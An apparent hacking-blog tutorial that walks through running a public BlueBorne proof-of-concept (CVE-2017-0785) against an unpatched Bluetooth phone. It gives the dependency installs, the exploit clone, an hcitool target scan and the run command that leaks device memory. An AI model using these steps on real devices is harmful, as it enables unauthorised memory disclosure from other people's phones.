CyberMorans,
BlueBorne is an attack vector by which hackers😈 can leverage Bluetooth connections to penetrate and take complete control over targeted devices 😋
BlueTooth is and will remain one of the most vulnerable protocols, making all our data on our BlueTooth-enabled devices vulnerable to being hacked🧐. Armis Security released a number exploits against unpatched BlueTooth devices. These exploits are capable of attacking iOS (but not iOS 10), Microsoft Windows, and Android. In the last 2 years, nearly every company has issued patches, but for a number of reasons many Android systems are still unpatched 🤕
The exploit masquerades as a BlueTooth device and is able to exploit vulnerabilities in SDP 😜 The BlueTooth device does not even need to be in discover mode, it only needs to ON. Since BlueTooth has access to the inner sanctum of the kernel, nearly everything is vulnerable. In this post, we will look at how to extract data from an unpatched BlueTooth device using the BlueBorne exploit😋
Getting Started 🤖
The first step of course is to have a unpatched device. I will be using an old unused phone I found around the house. I will also be using an old linux box --as my other VMs are unavailable/pre-ocuppied at the moment🙄-- So, lets get to it folks...🤤
You will need a BlueTooth adapter to communicate to your target. There are many BlueTooth adapters that are Linux compatible. Install the dependencies into our Kali system 👇
apt-get install bluetooth libbluetooth-dev
also...😜
pip install pybluez
pip install pwntoolsInstall the Python Script 🤖
Although Armis developed these exploits, they have not released them to the public. Fortunately, a security researcher has developed a python script based upon the Armis research. You can find it on github. Simply clone it into your system 👇
git clone https://github.com/ojasookert/CVE-2017-0785
After cloning it, you will see a new directory created, CVE-2017-0785 👇
Navigate to that directory and do a long listing (ls -l). You will see a README.md file and the python script CVE-2017-0785.py 👇
cd CVE-2017-0785
Give yourself execute permissions on this script.
chmod 755 CVE-2017-0785.pyGet the MAC address of the Target 🤖
Now that we have our dependencies met and installed the Python script, the only left to be done is to obtain the MAC address of the target system. We can scan for BlueTooth devices with the hcitool. on Kali Linux 👇
hcitool scan
This 👆 utility will go out and scan for any available BlueTooth devices within range. As you can see, it found the phone. I have obscured the MAC address.
Execute the BlueBourne Exploit 🤖
Now, we have everything we need to exploit the BlueTooth device and extract it's memory. To run the exploit, we simply enter python, the name of the script and TARGET= followed by the mac address of the target system 👇
python CVE-2017-785.py TARGET=<MAC ADDRESS of Target>
👆 The python script has exploited the target and removed the first 30 bytes from memory! We can edit the script to extract even more memory 😝
BlueTooth hacking is considered a niche field for a number of years, but expect it to heat up in time, making all mobile devices vulnerable 💀
Conclusion 🤖
Subscribe to receive notifications of similar posts 😋 where we will be reverse engineering malware and the technical aspect of vulnerabilities as well as how an attacker may use this vulnerability as an attack vector and other Infosec stuff...😋
Morans,
Thank you for your time, Like and leave a comment/review and as always, stay awesome! 😋👊 💪
留言